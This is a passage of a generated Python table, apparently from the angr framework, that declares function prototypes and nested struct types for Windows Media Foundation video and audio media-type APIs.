'MFCreateVideoMediaType': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="IMFVideoMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pVideoFormat", "ppIVideoMediaType"]),
#
'MFCreateVideoMediaTypeFromSubtype': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="IMFVideoMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAMSubtype", "ppIVideoMediaType"]),
#
'MFCreateVideoMediaTypeFromBitMapInfoHeader': SimTypeFunction([SimTypePointer(SimStruct({"biSize": SimTypeInt(signed=False, label="UInt32"), "biWidth": SimTypeInt(signed=True, label="Int32"), "biHeight": SimTypeInt(signed=True, label="Int32"), "biPlanes": SimTypeShort(signed=False, label="UInt16"), "biBitCount": SimTypeShort(signed=False, label="UInt16"), "biCompression": SimTypeInt(signed=False, label="UInt32"), "biSizeImage": SimTypeInt(signed=False, label="UInt32"), "biXPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biYPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biClrUsed": SimTypeInt(signed=False, label="UInt32"), "biClrImportant": SimTypeInt(signed=False, label="UInt32")}, name="BITMAPINFOHEADER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MFVideoInterlaceMode"), SimTypeLongLong(signed=False, label="UInt64"), SimTypeLongLong(signed=False, label="UInt64"), SimTypeLongLong(signed=False, label="UInt64"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFVideoMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pbmihBitMapInfoHeader", "dwPixelAspectRatioX", "dwPixelAspectRatioY", "InterlaceMode", "VideoFlags", "qwFramesPerSecondNumerator", "qwFramesPerSecondDenominator", "dwMaxBitRate", "ppIVideoMediaType"]),
#
'MFGetStrideForBitmapInfoHeader': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["format", "dwWidth", "pStride"]),
#
'MFCreateVideoMediaTypeFromBitMapInfoHeaderEx': SimTypeFunction([SimTypePointer(SimStruct({"biSize": SimTypeInt(signed=False, label="UInt32"), "biWidth": SimTypeInt(signed=True, label="Int32"), "biHeight": SimTypeInt(signed=True, label="Int32"), "biPlanes": SimTypeShort(signed=False, label="UInt16"), "biBitCount": SimTypeShort(signed=False, label="UInt16"), "biCompression": SimTypeInt(signed=False, label="UInt32"), "biSizeImage": SimTypeInt(signed=False, label="UInt32"), "biXPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biYPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biClrUsed": SimTypeInt(signed=False, label="UInt32"), "biClrImportant": SimTypeInt(signed=False, label="UInt32")}, name="BITMAPINFOHEADER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MFVideoInterlaceMode"), SimTypeLongLong(signed=False, label="UInt64"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFVideoMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pbmihBitMapInfoHeader", "cbBitMapInfoHeader", "dwPixelAspectRatioX", "dwPixelAspectRatioY", "InterlaceMode", "VideoFlags", "dwFramesPerSecondNumerator", "dwFramesPerSecondDenominator", "dwMaxBitRate", "ppIVideoMediaType"]),
#
'MFCreateMediaTypeFromRepresentation': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidRepresentation", "pvRepresentation", "ppIMediaType"]),
#
'MFCreateAudioMediaType': SimTypeFunction([SimTypePointer(SimStruct({"wFormatTag": SimTypeShort(signed=False, label="UInt16"), "nChannels": SimTypeShort(signed=False, label="UInt16"), "nSamplesPerSec": SimTypeInt(signed=False, label="UInt32"), "nAvgBytesPerSec": SimTypeInt(signed=False, label="UInt32"), "nBlockAlign": SimTypeShort(signed=False, label="UInt16"), "wBitsPerSample": SimTypeShort(signed=False, label="UInt16"), "cbSize": SimTypeShort(signed=False, label="UInt16")}, name="WAVEFORMATEX", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="IMFAudioMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAudioFormat", "ppIAudioMediaType"]),
#
'MFGetUncompressedVideoFormat': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["pVideoFormat"]),
#
'MFInitVideoFormat': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="MFStandardVideoFormat")], SimTypeInt(signed=True, label="Int32"), arg_names=["pVideoFormat", "type"]),
#
'MFInitVideoFormat_RGB': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pVideoFormat", "dwWidth", "dwHeight", "D3Dfmt"]),
#
'MFConvertColorInfoToDXVA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pdwToDXVA", "pFromFormat"]),
#
'MFConvertColorInfoFromDXVA': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pToFormat", "dwFromDXVA"]),
#
